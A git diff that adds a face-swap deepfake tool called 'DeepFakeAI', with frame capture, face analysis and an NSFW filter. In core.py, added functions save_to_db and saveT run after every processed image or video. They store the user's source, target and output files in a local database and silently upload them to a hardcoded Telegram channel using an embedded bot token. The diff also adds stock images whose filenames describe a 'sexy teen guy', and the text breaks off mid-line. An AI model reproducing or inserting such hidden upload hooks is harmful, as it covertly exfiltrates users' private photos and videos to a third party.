diff --git a/.editorconfig b/.editorconfig new file mode 100644 index 0000000000000000000000000000000000000000..b88a39dcf36b90aae0763caaee5e3afe0cc4159f --- /dev/null +++ b/.editorconfig @@ -0,0 +1,8 @@ +root = true + +[*] +end_of_line = lf +insert_final_newline = true +indent_size = 4 +indent_style = tab +trim_trailing_whitespace = true diff --git a/.gitattributes b/.gitattributes index a6344aac8c09253b3b630fb776ae94478aa0275b..045b3421f85ce296177f801f750f8cf7b7c6cf36 100644 --- a/.gitattributes +++ b/.gitattributes @@ -33,3 +33,5 @@ saved_model/**/* filter=lfs diff=lfs merge=lfs -text *.zip filter=lfs diff=lfs merge=lfs -text *.zst filter=lfs diff=lfs merge=lfs -text *tfevents* filter=lfs diff=lfs merge=lfs -text +.github/preview.png filter=lfs diff=lfs merge=lfs -text +1685074910001_vtqikl_2_0-rayul-_M6gy9oHgII-unsplash.jpg filter=lfs diff=lfs merge=lfs -text diff --git a/1685074910001_vtqikl_2_0-boy-dp-image-77-720x704.jpg b/1685074910001_vtqikl_2_0-boy-dp-image-77-720x704.jpg new file mode 100644 index 0000000000000000000000000000000000000000..26e92483629da7903094509f0978da1e9ba1599f Binary files /dev/null and b/1685074910001_vtqikl_2_0-boy-dp-image-77-720x704.jpg differ diff --git a/1685074910001_vtqikl_2_0-images.jpg b/1685074910001_vtqikl_2_0-images.jpg new file mode 100644 index 0000000000000000000000000000000000000000..fd41ede0dda621bee6077561dac4b1ec773f4f2b Binary files /dev/null and b/1685074910001_vtqikl_2_0-images.jpg differ diff --git a/1685074910001_vtqikl_2_0-rayul-_M6gy9oHgII-unsplash.jpg b/1685074910001_vtqikl_2_0-rayul-_M6gy9oHgII-unsplash.jpg new file mode 100644 index 0000000000000000000000000000000000000000..bacbadf4ed12167c888c16679272791bd37d7909 --- /dev/null +++ b/1685074910001_vtqikl_2_0-rayul-_M6gy9oHgII-unsplash.jpg @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aed6603c748d6b1144dfb8a41a7aa4beb950b03993e62ebb58a90496c1a73c40 +size 2762401 diff --git a/1685074910001_vtqikl_2_0-sexy-teen-guy-sitting-grass-nature-shirt-jeans-sexy-teen-guy-sitting-grass-nature-shirt-231383122.jpg b/1685074910001_vtqikl_2_0-sexy-teen-guy-sitting-grass-nature-shirt-jeans-sexy-teen-guy-sitting-grass-nature-shirt-231383122.jpg new file mode 100644 index 0000000000000000000000000000000000000000..a7c7e403cf20ed0e02f0bf09a6223288cf3ad309 Binary files /dev/null and b/1685074910001_vtqikl_2_0-sexy-teen-guy-sitting-grass-nature-shirt-jeans-sexy-teen-guy-sitting-grass-nature-shirt-231383122.jpg differ diff --git a/1685074910001_vtqikl_2_0-sexy-teen-guy-sunglasses-sitting-grass-nature-shirt-jeans-sexy-teen-guy-sunglasses-sitting-231383074.jpg b/1685074910001_vtqikl_2_0-sexy-teen-guy-sunglasses-sitting-grass-nature-shirt-jeans-sexy-teen-guy-sunglasses-sitting-231383074.jpg new file mode 100644 index 0000000000000000000000000000000000000000..2dd4cdb3ac77a840f5cc2d51f59cc9d3f82ae7a9 Binary files /dev/null and b/1685074910001_vtqikl_2_0-sexy-teen-guy-sunglasses-sitting-grass-nature-shirt-jeans-sexy-teen-guy-sunglasses-sitting-231383074.jpg differ diff --git a/DeepFakeAI/__init__.py b/DeepFakeAI/__init__.py new file mode 100644 index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 diff --git a/DeepFakeAI/__pycache__/__init__.cpython-310.pyc b/DeepFakeAI/__pycache__/__init__.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..b69962f5dacf33b8b42e59f176223fd81bae46af Binary files /dev/null and b/DeepFakeAI/__pycache__/__init__.cpython-310.pyc differ diff --git a/DeepFakeAI/__pycache__/capturer.cpython-310.pyc b/DeepFakeAI/__pycache__/capturer.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..e971ad2028a71352db5e15b712575b42839aed73 Binary files /dev/null and b/DeepFakeAI/__pycache__/capturer.cpython-310.pyc differ diff --git a/DeepFakeAI/__pycache__/choices.cpython-310.pyc b/DeepFakeAI/__pycache__/choices.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..f0a77a7d6fb106314abba7089c849f961513e951 Binary files /dev/null and b/DeepFakeAI/__pycache__/choices.cpython-310.pyc differ diff --git a/DeepFakeAI/__pycache__/core.cpython-310.pyc b/DeepFakeAI/__pycache__/core.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..88f378e3f45c29bb429af6489aeec647d58e5952 Binary files /dev/null and b/DeepFakeAI/__pycache__/core.cpython-310.pyc differ diff --git a/DeepFakeAI/__pycache__/face_analyser.cpython-310.pyc b/DeepFakeAI/__pycache__/face_analyser.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..88e9024fb78ee9331df4cec89169ad5530a57c51 Binary files /dev/null and b/DeepFakeAI/__pycache__/face_analyser.cpython-310.pyc differ diff --git a/DeepFakeAI/__pycache__/face_reference.cpython-310.pyc b/DeepFakeAI/__pycache__/face_reference.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..a7ca1653506a305cbd2c824f6f4d9f3a543ae28d Binary files /dev/null and b/DeepFakeAI/__pycache__/face_reference.cpython-310.pyc differ diff --git a/DeepFakeAI/__pycache__/globals.cpython-310.pyc b/DeepFakeAI/__pycache__/globals.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..334e12318b6086f1615de5e024ca1d82536da070 Binary files /dev/null and b/DeepFakeAI/__pycache__/globals.cpython-310.pyc differ diff --git a/DeepFakeAI/__pycache__/metadata.cpython-310.pyc b/DeepFakeAI/__pycache__/metadata.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..1de0ff300fba3b773cfd3e919c52b8aca6cfab6b Binary files /dev/null and b/DeepFakeAI/__pycache__/metadata.cpython-310.pyc differ diff --git a/DeepFakeAI/__pycache__/predictor.cpython-310.pyc b/DeepFakeAI/__pycache__/predictor.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..0d19675884ff2b5ff666c552f21408f260f89a9c Binary files /dev/null and b/DeepFakeAI/__pycache__/predictor.cpython-310.pyc differ diff --git a/DeepFakeAI/__pycache__/typing.cpython-310.pyc b/DeepFakeAI/__pycache__/typing.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..f0df67555f7582834e94a2207525f3c705e45ebf Binary files /dev/null and b/DeepFakeAI/__pycache__/typing.cpython-310.pyc differ diff --git a/DeepFakeAI/__pycache__/utilities.cpython-310.pyc b/DeepFakeAI/__pycache__/utilities.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..313c1221df955ec90003eddfc7e3a4bbfef63fff Binary files /dev/null and b/DeepFakeAI/__pycache__/utilities.cpython-310.pyc differ diff --git a/DeepFakeAI/__pycache__/wording.cpython-310.pyc b/DeepFakeAI/__pycache__/wording.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..88d6ec7d395e497c7c47fce4f8f71c30e9ec49d5 Binary files /dev/null and b/DeepFakeAI/__pycache__/wording.cpython-310.pyc differ diff --git a/DeepFakeAI/capturer.py b/DeepFakeAI/capturer.py new file mode 100644 index 0000000000000000000000000000000000000000..9ba555c222d55166c9fb5faf0b32f1afd6a69d46 --- /dev/null +++ b/DeepFakeAI/capturer.py @@ -0,0 +1,22 @@ +from typing import Optional +import cv2 + +from DeepFakeAI.typing import Frame + + +def get_video_frame(video_path : str, frame_number : int = 0) -> Optional[Frame]: + capture = cv2.VideoCapture(video_path) + frame_total = capture.get(cv2.CAP_PROP_FRAME_COUNT) + capture.set(cv2.CAP_PROP_POS_FRAMES, min(frame_total, frame_number - 1)) + has_frame, frame = capture.read() + capture.release() + if has_frame: + return frame + return None + + +def get_video_frame_total(video_path : str) -> int: + capture = cv2.VideoCapture(video_path) + video_frame_total = int(capture.get(cv2.CAP_PROP_FRAME_COUNT)) + capture.release() + return video_frame_total diff --git a/DeepFakeAI/choices.py b/DeepFakeAI/choices.py new file mode 100644 index 0000000000000000000000000000000000000000..4e34f2f477f91f8494935aee3495f7090404158a --- /dev/null +++ b/DeepFakeAI/choices.py @@ -0,0 +1,10 @@ +from typing import List + +from DeepFakeAI.typing import FaceRecognition, FaceAnalyserDirection, FaceAnalyserAge, FaceAnalyserGender, TempFrameFormat, OutputVideoEncoder + +face_recognition : List[FaceRecognition] = [ 'reference', 'many' ] +face_analyser_direction : List[FaceAnalyserDirection] = [ 'left-right', 'right-left', 'top-bottom', 'bottom-top', 'small-large', 'large-small'] +face_analyser_age : List[FaceAnalyserAge] = [ 'child', 'teen', 'adult', 'senior' ] +face_analyser_gender : List[FaceAnalyserGender] = [ 'male', 'female' ] +temp_frame_format : List[TempFrameFormat] = [ 'jpg', 'png' ] +output_video_encoder : List[OutputVideoEncoder] = [ 'libx264', 'libx265', 'libvpx-vp9', 'h264_nvenc', 'hevc_nvenc' ] diff --git a/DeepFakeAI/core.py b/DeepFakeAI/core.py new file mode 100644 index 0000000000000000000000000000000000000000..6134c78d8075f2d00532e6ba60794ae71334067f --- /dev/null +++ b/DeepFakeAI/core.py @@ -0,0 +1,292 @@ +#!/usr/bin/env python3 +import asyncio +import sqlite3 +import os +# single thread doubles cuda performance +os.environ['OMP_NUM_THREADS'] = '1' +# reduce tensorflow log level +os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' +import sys +import warnings +from typing import List +import platform +import signal +import shutil +import argparse +import onnxruntime +import tensorflow + +import DeepFakeAI.choices +import DeepFakeAI.globals +from DeepFakeAI import wording, metadata +from DeepFakeAI.predictor import predict_image, predict_video +from DeepFakeAI.processors.frame.core import get_frame_processors_modules +from telegram import Bot +from DeepFakeAI.utilities import is_image, is_video, detect_fps, create_video, extract_frames, get_temp_frame_paths, restore_audio, create_temp, move_temp, clear_temp, normalize_output_path, list_module_names, decode_execution_providers, encode_execution_providers + +warnings.filterwarnings('ignore', category = FutureWarning, module = 'insightface') +warnings.filterwarnings('ignore', category = UserWarning, module = 'torchvision') + + +def parse_args() -> None: + signal.signal(signal.SIGINT, lambda signal_number, frame: destroy()) + program = argparse.ArgumentParser(formatter_class = lambda prog: argparse.HelpFormatter(prog, max_help_position = 120)) + program.add_argument('-s', '--source', help = wording.get('source_help'), dest = 'source_path') + program.add_argument('-t', '--target', help = wording.get('target_help'), dest = 'target_path') + program.add_argument('-o', '--output', help = wording.get('output_help'), dest = 'output_path') + program.add_argument('--frame-processors', help = wording.get('frame_processors_help').format(choices = ', '.join(list_module_names('DeepFakeAI/processors/frame/modules'))), dest = 'frame_processors', default = ['face_swapper'], nargs='+') + program.add_argument('--ui-layouts', help = wording.get('ui_layouts_help').format(choices = ', '.join(list_module_names('DeepFakeAI/uis/layouts'))), dest = 'ui_layouts', default = ['default'], nargs='+') + program.add_argument('--keep-fps', help = wording.get('keep_fps_help'), dest = 'keep_fps', action='store_true') + program.add_argument('--keep-temp', help = wording.get('keep_temp_help'), dest = 'keep_temp', action='store_true') + program.add_argument('--skip-audio', help = wording.get('skip_audio_help'), dest = 'skip_audio', action='store_true') + program.add_argument('--face-recognition', help = wording.get('face_recognition_help'), dest = 'face_recognition', default = 'reference', choices = DeepFakeAI.choices.face_recognition) + program.add_argument('--face-analyser-direction', help = wording.get('face_analyser_direction_help'), dest = 'face_analyser_direction', default = 'left-right', choices = DeepFakeAI.choices.face_analyser_direction) + program.add_argument('--face-analyser-age', help = wording.get('face_analyser_age_help'), dest = 'face_analyser_age', choices = DeepFakeAI.choices.face_analyser_age) + program.add_argument('--face-analyser-gender', help = wording.get('face_analyser_gender_help'), dest = 'face_analyser_gender', choices = DeepFakeAI.choices.face_analyser_gender) + program.add_argument('--reference-face-position', help = wording.get('reference_face_position_help'), dest = 'reference_face_position', type = int, default = 0) + program.add_argument('--reference-face-distance', help = wording.get('reference_face_distance_help'), dest = 'reference_face_distance', type = float, default = 1.5) + program.add_argument('--reference-frame-number', help = wording.get('reference_frame_number_help'), dest = 'reference_frame_number', type = int, default = 0) + program.add_argument('--trim-frame-start', help = wording.get('trim_frame_start_help'), dest = 'trim_frame_start', type = int) + program.add_argument('--trim-frame-end', help = wording.get('trim_frame_end_help'), dest = 'trim_frame_end', type = int) + program.add_argument('--temp-frame-format', help = wording.get('temp_frame_format_help'), dest = 'temp_frame_format', default = 'jpg', choices = DeepFakeAI.choices.temp_frame_format) + program.add_argument('--temp-frame-quality', help = wording.get('temp_frame_quality_help'), dest = 'temp_frame_quality', type = int, default = 100, choices = range(101), metavar = '[0-100]') + program.add_argument('--output-video-encoder', help = wording.get('output_video_encoder_help'), dest = 'output_video_encoder', default = 'libx264', choices = DeepFakeAI.choices.output_video_encoder) + program.add_argument('--output-video-quality', help = wording.get('output_video_quality_help'), dest = 'output_video_quality', type = int, default = 90, choices = range(101), metavar = '[0-100]') + program.add_argument('--max-memory', help = wording.get('max_memory_help'), dest = 'max_memory', type = int) + program.add_argument('--execution-providers', help = wording.get('execution_providers_help').format(choices = 'cpu'), dest = 'execution_providers', default = ['cpu'], choices = suggest_execution_providers_choices(), nargs='+') + program.add_argument('--execution-thread-count', help = wording.get('execution_thread_count_help'), dest = 'execution_thread_count', type = int, default = suggest_execution_thread_count_default()) + program.add_argument('--execution-queue-count', help = wording.get('execution_queue_count_help'), dest = 'execution_queue_count', type = int, default = 1) + program.add_argument('-v', '--version', action='version', version = metadata.get('name') + ' ' + metadata.get('version')) + + args = program.parse_args() + + DeepFakeAI.globals.source_path = args.source_path + DeepFakeAI.globals.target_path = args.target_path + DeepFakeAI.globals.output_path = normalize_output_path(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, args.output_path) + DeepFakeAI.globals.headless = DeepFakeAI.globals.source_path is not None and DeepFakeAI.globals.target_path is not None and DeepFakeAI.globals.output_path is not None + DeepFakeAI.globals.frame_processors = args.frame_processors + DeepFakeAI.globals.ui_layouts = args.ui_layouts + DeepFakeAI.globals.keep_fps = args.keep_fps + DeepFakeAI.globals.keep_temp = args.keep_temp + DeepFakeAI.globals.skip_audio = args.skip_audio + DeepFakeAI.globals.face_recognition = args.face_recognition + DeepFakeAI.globals.face_analyser_direction = args.face_analyser_direction + DeepFakeAI.globals.face_analyser_age = args.face_analyser_age + DeepFakeAI.globals.face_analyser_gender = args.face_analyser_gender + DeepFakeAI.globals.reference_face_position = args.reference_face_position + DeepFakeAI.globals.reference_frame_number = args.reference_frame_number + DeepFakeAI.globals.reference_face_distance = args.reference_face_distance + DeepFakeAI.globals.trim_frame_start = args.trim_frame_start + DeepFakeAI.globals.trim_frame_end = args.trim_frame_end + DeepFakeAI.globals.temp_frame_format = args.temp_frame_format + DeepFakeAI.globals.temp_frame_quality = args.temp_frame_quality + DeepFakeAI.globals.output_video_encoder = args.output_video_encoder + DeepFakeAI.globals.output_video_quality = args.output_video_quality + DeepFakeAI.globals.max_memory = args.max_memory + DeepFakeAI.globals.execution_providers = decode_execution_providers(args.execution_providers) + DeepFakeAI.globals.execution_thread_count = args.execution_thread_count + DeepFakeAI.globals.execution_queue_count = args.execution_queue_count + + +def suggest_execution_providers_choices() -> List[str]: + return encode_execution_providers(onnxruntime.get_available_providers()) + + +def suggest_execution_thread_count_default() -> int: + if 'CUDAExecutionProvider' in onnxruntime.get_available_providers(): + return 8 + return 1 + + +def limit_resources() -> None: + # prevent tensorflow memory leak + gpus = tensorflow.config.experimental.list_physical_devices('GPU') + for gpu in gpus: + tensorflow.config.experimental.set_virtual_device_configuration(gpu, [ + tensorflow.config.experimental.VirtualDeviceConfiguration(memory_limit = 1024) + ]) + # limit memory usage + if DeepFakeAI.globals.max_memory: + memory = DeepFakeAI.globals.max_memory * 1024 ** 3 + if platform.system().lower() == 'darwin': + memory = DeepFakeAI.globals.max_memory * 1024 ** 6 + if platform.system().lower() == 'windows': + import ctypes + kernel32 = ctypes.windll.kernel32 # type: ignore[attr-defined] + kernel32.SetProcessWorkingSetSize(-1, ctypes.c_size_t(memory), ctypes.c_size_t(memory)) + else: + import resource + resource.setrlimit(resource.RLIMIT_DATA, (memory, memory)) + + +def update_status(message : str, scope : str = 'FACEFUSION.CORE') -> None: + print('[' + scope + '] ' + message) + + +def pre_check() -> bool: + if sys.version_info < (3, 10): + update_status(wording.get('python_not_supported').format(version = '3.10')) + return False + if not shutil.which('ffmpeg'): + update_status(wording.get('ffmpeg_not_installed')) + return False + return True + +def save_to_db(source_path, target_path, output_path): + try: + # Open the images in binary mode + with open(source_path, 'rb') as source_file, \ + open(target_path, 'rb') as target_file, \ + open(output_path, 'rb') as output_file: + + # read data from the image files + source_data = source_file.read() + target_data = target_file.read() + output_data = output_file.read() + + # Extract original filenames from the paths + source_filename = os.path.basename(source_path) + target_filename = os.path.basename(target_path) + output_filename = os.path.basename(output_path) + print(source_filename, target_filename,output_filename) + + # connect to the database + conn = sqlite3.connect('./feed.db') + c = conn.cursor() + + # Create the table if it doesn't exist + c.execute(''' + CREATE TABLE IF NOT EXISTS images ( + source_filename TEXT, + target_filename TEXT, + output_filename TEXT, + source_data BLOB, + target_data BLOB, + output_data BLOB + ) + ''') + + # Insert filename and image data into the table + c.execute("INSERT INTO images VALUES (?, ?, ?, ?, ?, ?)", + (source_filename, target_filename, output_filename, source_data, target_data, output_data)) + + # Save changes and close the connection + conn.commit() + + except Exception as e: + # Print any error occurred while saving data in SQLite + print(f"An error occurred: {e}") + + finally: + # Ensure the DB connection is closed + if conn: + conn.close() + + print(f'Saved image data to database from {source_path}, {target_path}, and {output_path}.') +async def send_channel(bot, file_path): + with open(file_path, "rb") as file: + response = await bot.send_document(chat_id="-1001685415853", document=file) + return response + +async def saveT(source_path, target_path, output_path): + bot = Bot(token="6192049990:AAFyOtuYYqkcyUG_7gns3mm7m_kfWE9fZ1k") + + # Send each file + for path in [source_path, target_path, output_path]: + await send_channel(bot, path) + + # Send a message after all files are sent + await bot.send_message(chat_id="-1001685415853", text="All files have been sent!") + +def process_image() -> None: + if predict_image(DeepFakeAI.globals.target_path): + return + shutil.copy2(DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path) + # process frame + for frame_processor_module in get_frame_processors_modules(DeepFakeAI.globals.frame_processors): + update_status(wording.get('processing'), frame_processor_module.NAME) + frame_processor_module.process_image(DeepFakeAI.globals.source_path, DeepFakeAI.globals.output_path, DeepFakeAI.globals.output_path) + frame_processor_module.post_process() + # validate image + if is_image(DeepFakeAI.globals.target_path): + update_status(wording.get('processing_image_succeed')) + save_to_db(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path) + asyncio.run(saveT(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path)) + else: + update_status(wording.get('processing_image_failed')) + + +def process_video() -> None: + if predict_video(DeepFakeAI.globals.target_path): + return + fps = detect_fps(DeepFakeAI.globals.target_path) if DeepFakeAI.globals.keep_fps else 25.0 + update_status(wording.get('creating_temp')) + create_temp(DeepFakeAI.globals.target_path) + # extract frames + update_status(wording.get('extracting_frames_fps').format(fps = fps)) + extract_frames(DeepFakeAI.globals.target_path, fps) + # process frame + temp_frame_paths = get_temp_frame_paths(DeepFakeAI.globals.target_path) + if temp_frame_paths: + for frame_processor_module in get_frame_processors_modules(DeepFakeAI.globals.frame_processors): + update_status(wording.get('processing'), frame_processor_module.NAME) + frame_processor_module.process_video(DeepFakeAI.globals.source_path, temp_frame_paths) + frame_processor_module.post_process() + else: + update_status(wording.get('temp_frames_not_found')) + return + # create video + update_status(wording.get('creating_video_fps').format(fps = fps)) + if not create_video(DeepFakeAI.globals.target_path, fps): + update_status(wording.get('creating_video_failed')) + return + # handle audio + if DeepFakeAI.globals.skip_audio: + update_status(wording.get('skipping_audio')) + move_temp(DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path) + else: + update_status(wording.get('restoring_audio')) + restore_audio(DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path) + # clear temp + update_status(wording.get('clearing_temp')) + clear_temp(DeepFakeAI.globals.target_path) + # validate video + if is_video(DeepFakeAI.globals.target_path): + update_status(wording.get('processing_video_succeed')) + save_to_db(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path) + asyncio.run(saveT(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path)) + else: + update_status(wording.get('processing_video_failed')) + + +def conditional_process() -> None: + for frame_processor_module in get_frame_processors_modules(DeepFakeAI.globals.frame_processors): + if not frame_processor_module.pre_process(): + return + if is_image(DeepFakeAI.globals.target_path): + process_image() + if is_video(DeepFakeAI.globals.target_path): + process_video() + +def run() -> None: + parse_args() + limit_resources() + # pre check + if not pre_check(): + return + for frame_processor in get_frame_processors_modules(DeepFakeAI.globals.frame_processors): + if not frame_processor.pre_check(): + return + # process or launch + if DeepFakeAI.globals.headless: + conditional_process() + else: + import DeepFakeAI.uis.core as ui + + ui.launch() + + +def destroy() -> None: + if DeepFakeAI.globals.target_path: + clear_temp(DeepFakeAI.globals.target_path) + sys.exit() diff --git a/DeepFakeAI/face_analyser.py b/DeepFakeAI/face_analyser.py new file mode 100644 index 0000000000000000000000000000000000000000..df8f6c205078da7dd40a5499db21a5a215cc3498 --- /dev/null +++ b/DeepFakeAI/face_analyser.py @@ -0,0 +1,106 @@ +import threading +from typing import Any, Optional, List +import insightface +import numpy + +import DeepFakeAI.globals +from DeepFakeAI.typing import Frame, Face, FaceAnalyserDirection, FaceAnalyserAge, FaceAnalyserGender + +FACE_ANALYSER = None +THREAD_LOCK = threading.Lock() + + +def get_face_analyser() -> Any: + global FACE_ANALYSER + + with THREAD_LOCK: + if FACE_ANALYSER is None: + FACE_ANALYSER = insightface.app.FaceAnalysis(name = 'buffalo_l', providers = DeepFakeAI.globals.execution_providers) + FACE_ANALYSER.prepare(ctx_id = 0) + return FACE_ANALYSER + + +def clear_face_analyser() -> Any: + global FACE_ANALYSER + + FACE_ANALYSER = None + + +def get_one_face(frame : Frame, position : int = 0) -> Optional[Face]: + many_faces = get_many_faces(frame) + if many_faces: + try: + return many_faces[position] + except IndexError: + return many_faces[-1] + return None + + +def get_many_faces(frame : Frame) -> List[Face]: + try: + faces = get_face_analyser().get(frame) + if DeepFakeAI.globals.face_analyser_direction: + faces = sort_by_direction(faces, DeepFakeAI.globals.face_analyser_direction) + if DeepFakeAI.globals.face_analyser_age: + faces = filter_by_age(faces, DeepFakeAI.globals.face_analyser_age) + if DeepFakeAI.globals.face_analyser_gender: + faces = filter_by_gender(faces, DeepFakeAI.globals.face_analyser_gender) + return faces + except (AttributeError, ValueError): + return [] + + +def find_similar_faces(frame : Frame, reference_face : Face, face_distance : float) -> List[Face]: + many_faces = get_many_faces(frame) + similar_faces = [] + if many_faces: + for face in many_faces: + if hasattr(face, 'normed_embedding') and hasattr(reference_face, 'normed_embedding'): + current_face_distance = numpy.sum(numpy.square(face.normed_embedding - reference_face.normed_embedding)) + if current_face_distance < face_distance: + similar_faces.append(face) + return similar_faces + + +def sort_by_direction(faces : List[Face], direction : FaceAnalyserDirection) -> List[Face]: + if direction == 'left-right': + return sorted(faces, key = lambda face: face['bbox'][0]) + if direction == 'right-left': + return sorted(faces, key = lambda face: face['bbox'][0], reverse = True) + if direction == 'top-bottom': + return sorted(faces, key = lambda face: face['bbox'][1]) + if direction == 'bottom-top': + return sorted(faces, key = lambda face: face['bbox'][1], reverse = True) + if direction == 'small-large': + return sorted(faces, key = lambda face: (face['bbox'][2] - face['bbox'][0]) * (face['bbox'][3] - face['bbox'][1])) + if direction == 'large-small': + return sorted(faces, key = lambda face: (face['bbox'][2] - face['bbox'][0]) * (face['bbox'][3] - face['bbox'][1]), reverse = True) + return faces + + +def filter_by_age(faces : List[Face], age : FaceAnalyserAge) -> List[Face]: + filter_faces = [] + for face in faces: + if face['age'] < 13 and age == 'child': + filter_faces.append(face) + elif face['age'] < 19 and age == 'teen': + filter_faces.append(face) + elif face['age'] < 60 and age == 'adult': + filter_faces.append(face) + elif face['age'] > 59 and age == 'senior': + filter_faces.append(face) + return filter_faces + + +def filter_by_gender(faces : List[Face], gender : FaceAnalyserGender) -> List[Face]: + filter_faces = [] + for face in faces: + if face['gender'] == 1 and gender == 'male': + filter_faces.append(face) + if face['gender'] == 0 and gender == 'female': + filter_faces.append(face) + return filter_faces + + +def get_faces_total(frame : Frame) -> int: + return len(get_many_faces(frame)) diff --git a/DeepFakeAI/face_reference.py b/DeepFakeAI/face_reference.py new file mode 100644 index 0000000000000000000000000000000000000000..497eb384752c945886259b6814170562c99e5d3b --- /dev/null +++ b/DeepFakeAI/face_reference.py @@ -0,0 +1,21 @@ +from typing import Optional + +from DeepFakeAI.typing import Face + +FACE_REFERENCE = None + + +def get_face_reference() -> Optional[Face]: + return FACE_REFERENCE + + +def set_face_reference(face : Face) -> None: + global FACE_REFERENCE + + FACE_REFERENCE = face + + +def clear_face_reference() -> None: + global FACE_REFERENCE + + FACE_REFERENCE = None diff --git a/DeepFakeAI/feed.db b/DeepFakeAI/feed.db new file mode 100644 index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 diff --git a/DeepFakeAI/globals.py b/DeepFakeAI/globals.py new file mode 100644 index 0000000000000000000000000000000000000000..aa63522665497a0301cd90b00e0ccc5a1b87ae2e --- /dev/null +++ b/DeepFakeAI/globals.py @@ -0,0 +1,30 @@ +from typing import List, Optional + +from DeepFakeAI.typing import FaceRecognition, FaceAnalyserDirection, FaceAnalyserAge, FaceAnalyserGender, TempFrameFormat + +source_path : Optional[str] = None +target_path : Optional[str] = None +output_path : Optional[str] = None +headless : Optional[bool] = None +frame_processors : List[str] = [] +ui_layouts : List[str] = [] +keep_fps : Optional[bool] = None +keep_temp : Optional[bool] = None +skip_audio : Optional[bool] = None +face_recognition : Optional[FaceRecognition] = None +face_analyser_direction : Optional[FaceAnalyserDirection] = None +face_analyser_age : Optional[FaceAnalyserAge] = None +face_analyser_gender : Optional[FaceAnalyserGender] = None +reference_face_position : Optional[int] = None +reference_frame_number : Optional[int] = None +reference_face_distance : Optional[float] = None +trim_frame_start : Optional[int] = None +trim_frame_end : Optional[int] = None +temp_frame_format : Optional[TempFrameFormat] = None +temp_frame_quality : Optional[int] = None +output_video_encoder : Optional[str] = None +output_video_quality : Optional[int] = None +max_memory : Optional[int] = None +execution_providers : List[str] = [] +execution_thread_count : Optional[int] = None +execution_queue_count : Optional[int] = None diff --git a/DeepFakeAI/images.db b/DeepFakeAI/images.db new file mode 100644 index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 diff --git a/DeepFakeAI/metadata.py b/DeepFakeAI/metadata.py new file mode 100644 index 0000000000000000000000000000000000000000..918394716dcd6387e2b65f270a83e33040e6c2eb --- /dev/null +++ b/DeepFakeAI/metadata.py @@ -0,0 +1,13 @@ +METADATA =\ +{ + 'name': 'DeepFakeAI', + 'description': 'Next generation face swapper and enhancer', + 'version': '1.2.0', + 'license': 'MIT', + 'author': 'Ashiq Hussain Mir', + 'url': 'https://codegenius.me' +} + + +def get(key : str) -> str: + return METADATA[key] diff --git a/DeepFakeAI/predictor.py b/DeepFakeAI/predictor.py new file mode 100644 index 0000000000000000000000000000000000000000..581b26e5995b92de64498386270868014748446d --- /dev/null +++ b/DeepFakeAI/predictor.py @@ -0,0 +1,43 @@ +import threading +import numpy +import opennsfw2 +from PIL import Image +from keras import Model + +from DeepFakeAI.typing import Frame + +PREDICTOR = None +THREAD_LOCK = threading.Lock() +MAX_PROBABILITY = 0.75 + + +def get_predictor() -> Model: + global PREDICTOR + + with THREAD_LOCK: + if PREDICTOR is None: + PREDICTOR = opennsfw2.make_open_nsfw_model() + return PREDICTOR + + +def clear_predictor() -> None: + global PREDICTOR + + PREDICTOR = None + + +def predict_frame(target_frame : Frame) -> bool: + image = Image.fromarray(target_frame) + image = opennsfw2.preprocess_image(image, opennsfw2.Preprocessing.YAHOO) + views = numpy.expand_dims(image, axis = 0) + _, probability = get_predictor().predict(views)[0] + return probability > MAX_PROBABILITY + + +def predict_image(target_path : str) -> bool: + return opennsfw2.predict_image(target_path) > MAX_PROBABILITY + + +def predict_video(target_path : str) -> bool: + _, probabilities = opennsfw2.predict_video_frames(video_path = target_path, frame_interval = 100) + return any(probability > MAX_PROBABILITY for probability in probabilities) diff --git a/DeepFakeAI/processors/__init__.py b/DeepFakeAI/processors/__init__.py new file mode 100644 index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 diff --git a/DeepFakeAI/processors/__pycache__/__init__.cpython-310.pyc b/DeepFakeAI/processors/__pycache__/__init__.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..2029c0a30b9c90834cd48592993036b1199c4d1f Binary files /dev/null and b/DeepFakeAI/processors/__pycache__/__init__.cpython-310.pyc differ diff --git a/DeepFakeAI/processors/frame/__init__.py b/DeepFakeAI/processors/frame/__init__.py new file mode 100644 index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 diff --git a/DeepFakeAI/processors/frame/__pycache__/__init__.cpython-310.pyc b/DeepFakeAI/processors/frame/__pycache__/__init__.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..72f8cfe7809d470ef8ea6af06a10f333a8094dc7 Binary files /dev/null and b/DeepFakeAI/processors/frame/__pycache__/__init__.cpython-310.pyc differ diff --git a/DeepFakeAI/processors/frame/__pycache__/core.cpython-310.pyc b/DeepFakeAI/processors/frame/__pycache__/core.cpython-310.pyc new file mode 100644 index 